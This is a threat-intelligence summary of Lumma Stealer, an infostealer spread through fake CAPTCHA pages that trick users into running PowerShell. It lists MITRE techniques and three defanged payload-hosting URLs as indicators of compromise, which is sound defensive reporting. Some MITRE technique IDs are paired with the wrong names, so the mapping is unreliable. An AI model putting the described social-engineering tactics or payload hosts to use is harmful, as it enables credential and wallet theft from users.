The article discusses the rise of Lumma Stealer, a sophisticated type of Malware-as-a-Service (MaaS) that has emerged as a major threat to both individuals and organizations. Exploiting various distribution methods, particularly through fake CAPTCHA pages, Lumma Stealer successfully deceives users into executing malicious commands. Its intricate infection methods, including DLL sideloading and payload injection, enhance its ability to evade security detection. Affected: individuals, organizations, cybersecurity sector
Keypoints :
- Lumma Stealer was introduced in 2022 and is marketed primarily on underground platforms.
- It is distributed through techniques such as phishing emails, trojanized applications, and fake CAPTCHA pages.
- The fake CAPTCHA distribution method tricks users into executing malicious PowerShell commands.
- The malware employs DLL sideloading and overlay injection to evade detection.
- Successful infections leverage social engineering tactics, specifically through cloned websites and fraudulent Telegram channels.
- Lumma Stealer targets sensitive data, including cryptocurrency wallet information, two-factor authentication data, and system credentials.
MITRE Techniques :
- Execution (T1203): Users are tricked into executing malicious PowerShell commands through deceptive CAPTCHA pop-ups.
- Persistence (T1547): Lumma Stealer creates a registry entry to achieve persistence on infected machines.
- Defense Evasion (T1140 – Obfuscated Files or Information): The malware employs obfuscation techniques to conceal its PowerShell scripts and DLLs.
- Data Collection (T1005): The malware collects data such as credentials, cookies, and cryptocurrency wallet information.
- Command and Control (T1071): The malware communicates with C2 servers using encrypted HTTP POST requests to exfiltrate data.
Indicator of Compromise :
- [URL] https[:]//win15.b-cdn[.]net/win15.txt
- [URL] https[:]//win15.b-cdn[.]net/win15.zip
- [URL] hXXps://connect[.]klipfuzj[.]shop/firefire[.]png
Full Story: https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/